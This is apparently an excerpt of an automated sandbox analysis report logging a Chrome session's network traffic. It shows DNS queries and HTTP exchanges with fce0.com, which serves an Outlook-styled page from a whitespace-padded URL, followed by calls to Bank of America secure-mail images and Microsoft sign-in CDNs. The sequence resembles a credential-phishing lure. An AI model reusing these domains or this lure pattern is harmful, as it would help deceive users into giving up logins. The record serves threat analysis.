                                                                    Oct 28, 2024 14:03:45.442882061 CET49922443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:45.442923069 CET4434992213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:45.443398952 CET49922443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:45.443411112 CET4434992213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:45.453905106 CET4434992313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:45.454332113 CET49923443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:45.454351902 CET4434992313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:45.454720974 CET49923443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:45.454732895 CET4434992313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:45.537678957 CET4434992113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:45.537702084 CET4434992113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:45.537744999 CET4434992113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:45.537780046 CET49921443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:45.537862062 CET49921443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:45.538074970 CET49921443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:45.538074970 CET49921443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:45.538091898 CET4434992113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:45.538100958 CET4434992113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:45.540374994 CET49926443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:45.540416002 CET4434992613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:45.540648937 CET49926443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:45.540648937 CET49926443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:45.540707111 CET4434992613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:45.580705881 CET4434992213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:45.580842972 CET4434992213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:45.580991030 CET49922443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:45.580991030 CET49922443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:45.581043959 CET49922443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:45.581073999 CET4434992213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:45.583086967 CET49927443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:45.583123922 CET4434992713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:45.583302975 CET49927443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:45.583626032 CET49927443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:45.583638906 CET4434992713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:45.586751938 CET4434992313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:45.586967945 CET4434992313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:45.587244034 CET49923443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:45.587244987 CET49923443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:45.587244987 CET49923443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:45.589095116 CET49928443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:45.589171886 CET4434992813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:45.589457989 CET49928443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:45.589457989 CET49928443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:45.589531898 CET4434992813.107.246.60192.168.2.4
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Oct 28, 2024 14:02:23.122968912 CET53497021.1.1.1192.168.2.4
                                                                    Oct 28, 2024 14:02:23.125900030 CET53499881.1.1.1192.168.2.4
                                                                    Oct 28, 2024 14:02:24.635054111 CET53534301.1.1.1192.168.2.4
                                                                    Oct 28, 2024 14:02:25.051953077 CET5048953192.168.2.41.1.1.1
                                                                    Oct 28, 2024 14:02:25.052253962 CET6316853192.168.2.41.1.1.1
                                                                    Oct 28, 2024 14:02:25.086776018 CET53504891.1.1.1192.168.2.4
                                                                    Oct 28, 2024 14:02:25.087351084 CET53631681.1.1.1192.168.2.4
                                                                    Oct 28, 2024 14:02:26.211222887 CET5064253192.168.2.41.1.1.1
                                                                    Oct 28, 2024 14:02:26.220276117 CET53506421.1.1.1192.168.2.4
                                                                    Oct 28, 2024 14:02:26.227238894 CET5417853192.168.2.41.1.1.1
                                                                    Oct 28, 2024 14:02:26.660845995 CET53541781.1.1.1192.168.2.4
                                                                    Oct 28, 2024 14:02:27.041646957 CET5959653192.168.2.41.1.1.1
                                                                    Oct 28, 2024 14:02:27.042490005 CET5910953192.168.2.41.1.1.1
                                                                    Oct 28, 2024 14:02:27.049586058 CET53595961.1.1.1192.168.2.4
                                                                    Oct 28, 2024 14:02:27.050484896 CET53591091.1.1.1192.168.2.4
                                                                    Oct 28, 2024 14:02:28.763468981 CET5815453192.168.2.41.1.1.1
                                                                    Oct 28, 2024 14:02:28.764342070 CET5086653192.168.2.41.1.1.1
                                                                    Oct 28, 2024 14:02:28.926513910 CET53581541.1.1.1192.168.2.4
                                                                    Oct 28, 2024 14:02:29.105422020 CET53508661.1.1.1192.168.2.4
                                                                    Oct 28, 2024 14:02:40.433057070 CET138138192.168.2.4192.168.2.255
                                                                    Oct 28, 2024 14:02:41.761231899 CET53510091.1.1.1192.168.2.4
                                                                    Oct 28, 2024 14:03:01.113733053 CET53607161.1.1.1192.168.2.4
                                                                    Oct 28, 2024 14:03:16.024915934 CET5845753192.168.2.41.1.1.1
                                                                    Oct 28, 2024 14:03:16.025499105 CET4963253192.168.2.41.1.1.1
                                                                    Oct 28, 2024 14:03:16.065577030 CET53496321.1.1.1192.168.2.4
                                                                    Oct 28, 2024 14:03:16.165622950 CET53584571.1.1.1192.168.2.4
                                                                    Oct 28, 2024 14:03:18.342216015 CET5687753192.168.2.41.1.1.1
                                                                    Oct 28, 2024 14:03:18.342864037 CET5825753192.168.2.41.1.1.1
                                                                    Oct 28, 2024 14:03:18.349930048 CET53568771.1.1.1192.168.2.4
                                                                    Oct 28, 2024 14:03:18.350389957 CET53582571.1.1.1192.168.2.4
                                                                    Oct 28, 2024 14:03:18.965264082 CET6077153192.168.2.41.1.1.1
                                                                    Oct 28, 2024 14:03:18.965486050 CET6356953192.168.2.41.1.1.1
                                                                    Oct 28, 2024 14:03:18.977416039 CET53635691.1.1.1192.168.2.4
                                                                    Oct 28, 2024 14:03:18.984431982 CET53607711.1.1.1192.168.2.4
                                                                    Oct 28, 2024 14:03:20.564615011 CET6434053192.168.2.41.1.1.1
                                                                    Oct 28, 2024 14:03:20.565104961 CET6443053192.168.2.41.1.1.1
                                                                    Oct 28, 2024 14:03:20.575972080 CET53643401.1.1.1192.168.2.4
                                                                    Oct 28, 2024 14:03:20.577280045 CET53644301.1.1.1192.168.2.4
                                                                    Oct 28, 2024 14:03:20.647248983 CET4989453192.168.2.41.1.1.1
                                                                    Oct 28, 2024 14:03:20.647767067 CET5704553192.168.2.41.1.1.1
                                                                    Oct 28, 2024 14:03:20.657283068 CET53498941.1.1.1192.168.2.4
                                                                    Oct 28, 2024 14:03:20.657777071 CET53570451.1.1.1192.168.2.4
                                                                    Oct 28, 2024 14:03:20.750044107 CET53540981.1.1.1192.168.2.4
                                                                    Oct 28, 2024 14:03:20.776995897 CET5598753192.168.2.41.1.1.1
                                                                    Oct 28, 2024 14:03:20.777601004 CET5688253192.168.2.41.1.1.1
                                                                    Oct 28, 2024 14:03:20.788345098 CET53559871.1.1.1192.168.2.4
                                                                    Oct 28, 2024 14:03:20.788876057 CET53568821.1.1.1192.168.2.4
                                                                    Oct 28, 2024 14:03:22.471812963 CET53546811.1.1.1192.168.2.4
                                                                    Oct 28, 2024 14:03:23.554378986 CET53582541.1.1.1192.168.2.4
                                                                    Oct 28, 2024 14:03:23.713375092 CET5580053192.168.2.41.1.1.1
                                                                    Oct 28, 2024 14:03:23.713789940 CET6486053192.168.2.41.1.1.1
                                                                    Oct 28, 2024 14:03:23.720890999 CET53558001.1.1.1192.168.2.4
                                                                    Oct 28, 2024 14:03:23.722009897 CET53648601.1.1.1192.168.2.4
                                                                    TimestampSource IPDest IPChecksumCodeType
                                                                    Oct 28, 2024 14:02:26.660943031 CET192.168.2.41.1.1.1c251(Port unreachable)Destination Unreachable
                                                                    Oct 28, 2024 14:02:29.105927944 CET192.168.2.41.1.1.1c251(Port unreachable)Destination Unreachable
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Oct 28, 2024 14:02:25.051953077 CET192.168.2.41.1.1.10x84c3Standard query (0)fce0.comA (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:02:25.052253962 CET192.168.2.41.1.1.10x2930Standard query (0)fce0.com65IN (0x0001)false
                                                                    Oct 28, 2024 14:02:26.211222887 CET192.168.2.41.1.1.10xaa01Standard query (0)secmail.bankofamerica.comA (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:02:26.227238894 CET192.168.2.41.1.1.10xc1cdStandard query (0)secmail.bankofamerica.com65IN (0x0001)false
                                                                    Oct 28, 2024 14:02:27.041646957 CET192.168.2.41.1.1.10x5356Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:02:27.042490005 CET192.168.2.41.1.1.10xe4f5Standard query (0)www.google.com65IN (0x0001)false
                                                                    Oct 28, 2024 14:02:28.763468981 CET192.168.2.41.1.1.10x5d9aStandard query (0)secmail.bankofamerica.comA (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:02:28.764342070 CET192.168.2.41.1.1.10xd445Standard query (0)secmail.bankofamerica.com65IN (0x0001)false
                                                                    Oct 28, 2024 14:03:16.024915934 CET192.168.2.41.1.1.10x26e5Standard query (0)skinature.comA (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:16.025499105 CET192.168.2.41.1.1.10x5694Standard query (0)skinature.com65IN (0x0001)false
                                                                    Oct 28, 2024 14:03:18.342216015 CET192.168.2.41.1.1.10xa292Standard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:18.342864037 CET192.168.2.41.1.1.10xbe21Standard query (0)cdn.socket.io65IN (0x0001)false
                                                                    Oct 28, 2024 14:03:18.965264082 CET192.168.2.41.1.1.10x5031Standard query (0)skinature.comA (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:18.965486050 CET192.168.2.41.1.1.10x358dStandard query (0)skinature.com65IN (0x0001)false
                                                                    Oct 28, 2024 14:03:20.564615011 CET192.168.2.41.1.1.10x883eStandard query (0)www.w3schools.comA (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:20.565104961 CET192.168.2.41.1.1.10xa3f7Standard query (0)www.w3schools.com65IN (0x0001)false
                                                                    Oct 28, 2024 14:03:20.647248983 CET192.168.2.41.1.1.10x6882Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:20.647767067 CET192.168.2.41.1.1.10x708aStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                    Oct 28, 2024 14:03:20.776995897 CET192.168.2.41.1.1.10x5279Standard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:20.777601004 CET192.168.2.41.1.1.10x8b97Standard query (0)cdn.socket.io65IN (0x0001)false
                                                                    Oct 28, 2024 14:03:23.713375092 CET192.168.2.41.1.1.10x3f2eStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:23.713789940 CET192.168.2.41.1.1.10x4440Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Oct 28, 2024 14:02:25.086776018 CET1.1.1.1192.168.2.40x84c3No error (0)fce0.com199.188.200.231A (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:02:26.220276117 CET1.1.1.1192.168.2.40xaa01No error (0)secmail.bankofamerica.compe-0000ec08.gslb.pphosted.comCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 28, 2024 14:02:26.220276117 CET1.1.1.1192.168.2.40xaa01No error (0)pe-0000ec08.gslb.pphosted.com148.163.158.107A (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:02:26.660845995 CET1.1.1.1192.168.2.40xc1cdNo error (0)secmail.bankofamerica.compe-0000ec08.gslb.pphosted.comCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 28, 2024 14:02:27.049586058 CET1.1.1.1192.168.2.40x5356No error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:02:27.050484896 CET1.1.1.1192.168.2.40xe4f5No error (0)www.google.com65IN (0x0001)false
                                                                    Oct 28, 2024 14:02:28.926513910 CET1.1.1.1192.168.2.40x5d9aNo error (0)secmail.bankofamerica.compe-0000ec08.gslb.pphosted.comCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 28, 2024 14:02:28.926513910 CET1.1.1.1192.168.2.40x5d9aNo error (0)pe-0000ec08.gslb.pphosted.com148.163.158.107A (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:02:29.105422020 CET1.1.1.1192.168.2.40xd445No error (0)secmail.bankofamerica.compe-0000ec08.gslb.pphosted.comCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 28, 2024 14:02:35.732347012 CET1.1.1.1192.168.2.40xe3a1No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:02:35.732347012 CET1.1.1.1192.168.2.40xe3a1No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:02:36.419405937 CET1.1.1.1192.168.2.40xd10bNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 28, 2024 14:02:36.419405937 CET1.1.1.1192.168.2.40xd10bNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:02:50.118866920 CET1.1.1.1192.168.2.40x8653No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 28, 2024 14:02:50.118866920 CET1.1.1.1192.168.2.40x8653No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:16.165622950 CET1.1.1.1192.168.2.40x26e5No error (0)skinature.com50.87.179.240A (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:16.256443977 CET1.1.1.1192.168.2.40x34ceNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:16.256443977 CET1.1.1.1192.168.2.40x34ceNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:17.169308901 CET1.1.1.1192.168.2.40xaeebNo error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:17.169308901 CET1.1.1.1192.168.2.40xaeebNo error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:18.349930048 CET1.1.1.1192.168.2.40xa292No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:18.349930048 CET1.1.1.1192.168.2.40xa292No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.89A (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:18.349930048 CET1.1.1.1192.168.2.40xa292No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.78A (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:18.349930048 CET1.1.1.1192.168.2.40xa292No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.33A (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:18.349930048 CET1.1.1.1192.168.2.40xa292No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.5A (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:18.350389957 CET1.1.1.1192.168.2.40xbe21No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:18.984431982 CET1.1.1.1192.168.2.40x5031No error (0)skinature.com50.87.179.240A (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:20.575972080 CET1.1.1.1192.168.2.40x883eNo error (0)www.w3schools.comcs837.wac.edgecastcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:20.575972080 CET1.1.1.1192.168.2.40x883eNo error (0)cs837.wac.edgecastcdn.net192.229.133.221A (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:20.577280045 CET1.1.1.1192.168.2.40xa3f7No error (0)www.w3schools.comcs837.wac.edgecastcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:20.648354053 CET1.1.1.1192.168.2.40x6f6eNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:20.648354053 CET1.1.1.1192.168.2.40x6f6eNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:20.654486895 CET1.1.1.1192.168.2.40x6199No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:20.654486895 CET1.1.1.1192.168.2.40x6199No error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:20.654486895 CET1.1.1.1192.168.2.40x6199No error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:20.657283068 CET1.1.1.1192.168.2.40x6882No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:20.657283068 CET1.1.1.1192.168.2.40x6882No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:20.657283068 CET1.1.1.1192.168.2.40x6882No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:20.657777071 CET1.1.1.1192.168.2.40x708aNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:20.657777071 CET1.1.1.1192.168.2.40x708aNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:20.788345098 CET1.1.1.1192.168.2.40x5279No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:20.788345098 CET1.1.1.1192.168.2.40x5279No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.33A (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:20.788345098 CET1.1.1.1192.168.2.40x5279No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.5A (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:20.788345098 CET1.1.1.1192.168.2.40x5279No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.89A (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:20.788345098 CET1.1.1.1192.168.2.40x5279No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.78A (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:20.788876057 CET1.1.1.1192.168.2.40x8b97No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:21.849349022 CET1.1.1.1192.168.2.40x6581No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:21.849349022 CET1.1.1.1192.168.2.40x6581No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:21.860600948 CET1.1.1.1192.168.2.40xf057No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:21.860600948 CET1.1.1.1192.168.2.40xf057No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:23.720890999 CET1.1.1.1192.168.2.40x3f2eNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:23.720890999 CET1.1.1.1192.168.2.40x3f2eNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:23.720890999 CET1.1.1.1192.168.2.40x3f2eNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:23.722009897 CET1.1.1.1192.168.2.40x4440No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:23.722009897 CET1.1.1.1192.168.2.40x4440No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:36.148585081 CET1.1.1.1192.168.2.40x1237No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 28, 2024 14:03:36.148585081 CET1.1.1.1192.168.2.40x1237No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                    • fce0.com
                                                                    • https:
                                                                      • secmail.bankofamerica.com
                                                                      • skinature.com
                                                                      • cdn.socket.io
                                                                      • aadcdn.msauth.net
                                                                      • logincdn.msauth.net
                                                                      • www.w3schools.com
                                                                      • aadcdn.msftauth.net
                                                                    • fs.microsoft.com
                                                                    • otelrules.azureedge.net
                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.449735199.188.200.2314431704C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:02:25 UTC843OUTGET /vn%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/ HTTP/1.1
                                                                    Host: fce0.com
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Upgrade-Insecure-Requests: 1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: navigate
                                                                    Sec-Fetch-User: ?1
                                                                    Sec-Fetch-Dest: document
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-10-28 13:02:26 UTC246INHTTP/1.1 200 OK
                                                                    keep-alive: timeout=5, max=100
                                                                    x-powered-by: PHP/8.1.30
                                                                    content-type: text/html; charset=UTF-8
                                                                    content-length: 14700
                                                                    date: Mon, 28 Oct 2024 13:02:25 GMT
                                                                    server: LiteSpeed
                                                                    x-turbo-charged-by: LiteSpeed
                                                                    connection: close
                                                                    2024-10-28 13:02:26 UTC14700INData Raw: 3c 64 69 76 20 72 6f 6c 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3e 3c 64 69 76 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 4d 65 73 73 61 67 65 20 62 6f 64 79 22 20 63 6c 61 73 73 3d 22 75 6c 62 32 33 20 47 4e 71 56 6f 20 61 6c 6c 6f 77 54 65 78 74 53 65 6c 65 63 74 69 6f 6e 20 4f 75 47 6f 58 22 20 69 64 3d 22 55 6e 69 71 75 65 4d 65 73 73 61 67 65 42 6f 64 79 5f 31 30 22 3e 3c 64 69 76 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 2e 72 70 73 5f 32 31 34 33 20 23 78 5f 6f 75 74 6c 6f 6f 6b 20 61 0d 0a 09 7b 70 61 64 64 69 6e 67 3a 30 7d 0d 0a 2e 72 70 73 5f 32 31 34 33 20 2e 78 5f 45 78 74 65 72 6e 61 6c 43 6c 61 73 73 0d 0a 09 7b 77 69 64 74 68 3a 31 30 30 25 7d 0d 0a 2e 72
                                                                    Data Ascii: <div role="document"><div tabindex="0" aria-label="Message body" class="ulb23 GNqVo allowTextSelection OuGoX" id="UniqueMessageBody_10"><div><style type="text/css">....rps_2143 #x_outlook a{padding:0}.rps_2143 .x_ExternalClass{width:100%}.r


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.449738148.163.158.1074431704C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:02:28 UTC630OUTGET /securereader/Image?c=lock&b=1&rnd=0.00823190732671009 HTTP/1.1
                                                                    Host: secmail.bankofamerica.com
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: image
                                                                    Referer: https://fce0.com/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-10-28 13:02:28 UTC525INHTTP/1.1 200 200
                                                                    Date: Mon, 28 Oct 2024 13:02:28 GMT
                                                                    Server:
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                    Cache-Control: max-age=2592000
                                                                    Expires: Wed, 27 Nov 2024 13:02:28 GMT
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-XSS-Protection: 1; mode=block
                                                                    X-Content-Type-Options: nosniff
                                                                    Expect-CT: max-age=86400, enforce
                                                                    Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'; object-src 'self'
                                                                    X-UA-Compatible: IE=edge
                                                                    Connection: close
                                                                    Transfer-Encoding: chunked
                                                                    Content-Type: image/gif
